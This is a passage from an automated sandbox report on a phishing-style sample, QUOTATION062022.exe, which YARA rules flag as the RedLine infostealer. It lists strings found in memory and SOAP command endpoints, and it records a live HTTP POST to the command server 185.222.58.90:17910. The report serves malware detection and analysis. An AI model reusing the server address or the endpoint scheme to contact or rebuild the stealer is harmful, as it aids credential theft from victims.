                        Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://service.r
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://support.a
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                        Source: vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484540530.0000000007345000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484659526.0000000007361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                        Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                        Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                        Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                        Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.379339995.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484490972.000000000731F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                        Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                        Source: vbc.exe, 00000017.00000002.484659526.0000000007361000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484560508.000000000734A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                        Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                        Source: vbc.exe, 00000004.00000002.380198845.000000000777B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484781328.000000000740E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
                        Source: vbc.exe, 00000017.00000002.484781328.000000000740E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484659526.0000000007361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                        Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                        Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentme
                        Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                        Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                        Source: vbc.exe, 00000004.00000002.379339995.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484490972.000000000731F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/t_
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: QUOTATION062022.exe, 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000004.00000000.279823172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000000B.00000002.361910499.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.482951667.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.339858194.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                        Source: QUOTATION062022.exe, 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000004.00000000.279823172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000000B.00000002.361910499.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.482951667.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.339858194.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr, tmpE68F.tmp.23.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab1
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://get.adob
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://helpx.ad
                        Source: vbc.exe, vbc.exe, 00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000004.00000000.279823172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000000B.00000002.361910499.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.482951667.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.339858194.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                        Source: vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                        Source: vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                        Source: vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                        Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:17910Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: unknownDNS traffic detected: queries for: api.ip.sb

                        System Summary

                        barindex
                        Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.QUOTATION062022.exe.39e2f90.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 11.2.Data.exe.3acb170.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 11.2.Data.exe.3ae2f90.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 23.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 23.0.vbc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.QUOTATION062022.exe.39cb170.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 23.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.QUOTATION062022.exe.39cb170.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0.2.QUOTATION062022.exe.39e2f90.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 23.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 23.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 23.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 11.2.Data.exe.3ae2f90.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 11.2.Data.exe.3acb170.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
